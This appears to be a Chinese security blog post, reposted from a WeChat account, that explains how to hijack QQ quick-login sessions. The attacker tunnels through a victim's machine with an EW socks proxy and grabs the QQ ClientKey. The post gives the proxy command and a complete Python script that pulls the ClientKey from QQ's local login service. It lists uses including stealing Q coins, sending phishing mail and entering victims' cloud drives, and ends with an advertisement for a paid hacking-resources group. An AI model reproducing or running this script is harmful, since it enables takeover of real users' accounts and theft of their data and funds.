代理的妙用-QQ快捷登入
○ 免责声明
○ 前景提要
○ 问题复现
◇ 虚拟机环境
◇ 母机环境
○ QQ ClientKey利用
◇ 什么是ClientKey?
◇ 如何被利用?
· QQ圈发一些小广告
· 进入你的QQ账户盗取Q币
· 进入QQ邮箱(可以用来发钓鱼软件)
· 进入wegame
· 进入你的网盘
◇ 获取方式
◇ 获取脚本
○ 参考文献
○ 声明
本文是基于拿下目标权限后,偶然一次机会发现的一个技巧,这个技巧可以用以帮助在攻防演练时,快速收集目标的个人信息(网盘、QQ空间等一切可以快捷登入的目标)。
免责声明
NO.1
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号天虞实验室及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
前景提要
NO.2
作者:
我有一个好基友,这里称呼他为ZC,因为工作的原因,一次偶然间的机会,他使用他的电脑,在本机给我开了 Socks5 隧道。于是,我便用他的提供的隧道,对目标进行授权的渗透。
此时的我,手指一划,不小心点击了我的百度网盘,弹出了快捷登入,他的QQ映入我的眼帘,在他的允许下,我成功登入了他的网盘账号,看到了几个T的“学习资料”。
在今天凌晨,本人灵光乍现,突发奇想,想到之前发现的这个事情,于是便心血来潮,写下了这篇小文。
问题复现
NO.3
一台虚拟机:win10
本地母机:win10
虚拟机环境
打开一台已经沉睡了的虚拟机,在上面安装了腾讯QQ,还有翻了个EW做代理工具
登入QQ:
EW命令:
ew_for_Win.exe -s ssocksd -l 1080
母机环境
此时,母机没有登入QQ,我们尝试打开QQ空间发现虚拟机登入QQ,在这里显示
打开百度网盘的快捷登入,发现虚拟机登入的QQ也有显示
QQ ClientKey利用
NO.4
QQ是中国最流行的即时通讯软件之一,它的用户数以亿计。如此庞大的用户群体自然成为了黑客和网络犯罪分子的主要目标。在多种盗号手段中,近年来,利用QQ的ClientKey进行盗号的手段受到了广泛关注。
什么是ClientKey?
ClientKey是QQ客户端与服务器通信时用于身份验证的一个关键信息。你可以将其视为一个"密码",它确保了用户与QQ服务器之间的通讯是安全的。
当你在QQ客户端中登录时,该ClientKey会被生成并储存,随后的所有与QQ服务器的交互都将依赖这个ClientKey。
如何被利用?
黑客通过各种嗅探工具或恶意软件截获用户的网络流量,从中提取出ClientKey。利用这个机制可以快捷登入,造成以下风险。
1.QQ圈发一些小广告
2.进入你的QQ账户盗取Q币
3.进入QQ邮箱(可以用来发钓鱼软件)
4.进入WeGame
5.进入你的网盘
等等等等....
获取方式
获取脚本
母机配置好代理后,运行即可获取虚拟机上登入的QQkey
import requestsimport jsondef main():BASE_URL = "https://localhost.ptlogin2.qq.com:4301/"HEADERS = {"Referer": "https://xui.ptlogin2.qq.com/"}token_url = ("https://xui.ptlogin2.qq.com/cgi-bin/xlogin?target=self&appid=522005705&daid=4""&s_url=https://wx.mail.qq.com/list/readtemplate?name=login_jump.html%26target=&style=25&low_login=1""&proxy_url=https://mail.qq.com/proxy.html&need_qr=0&hide_border=1&border_radius=0""&self_regurl=http://zc.qq.com/chs/index.html?type=1&app_id=11005?t=regist""&pt_feedback_link=http://support.qq.com/discuss/350_1.shtml""&css=https://res.mail.qq.com/zh_CN/htmledition/style/ptlogin_input_for_xmail5ec0c8.css")pt_local_tk = requests.get(token_url).cookies['pt_local_token']uins_response = requests.get(BASE_URL + "pt_get_uins", headers=HEADERS,params={"callback": "ptui_getuins_CB", "r": 0.9772917378703209, "pt_local_tk": pt_local_tk},cookies={"pt_local_token": pt_local_tk}).contentuid = json.loads("[" + uins_response.split(b"[")[1].split(b']')[0].decode() + "]")[0]['uin']clientkey = requests.get(BASE_URL + "pt_get_st", headers=HEADERS,params={"clientuin": uid, "r": 0.5251440802971573, "pt_local_tk": pt_local_tk, "callback": "__jp0"},cookies={"pt_local_token": pt_local_tk}).cookies['clientkey']print(clientkey)if __name__ == "__main__":main()
参考文献
NO.5
https://nekokami0527.com/2022/06/27/QQ-ClientKey-%E7%9B%97%E5%8F%B7%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90https://blog.csdn.net/qq_39190622/article/details/128907064
声明
NO.6
本文作者:A
本文编辑:Yusa
感谢 A 师傅 (๑•̀ㅂ•́)و✧
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
原文始发于微信公众号(渗透安全团队):攻防演练技巧分享之代理的妙用:QQ快捷登入劫持
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论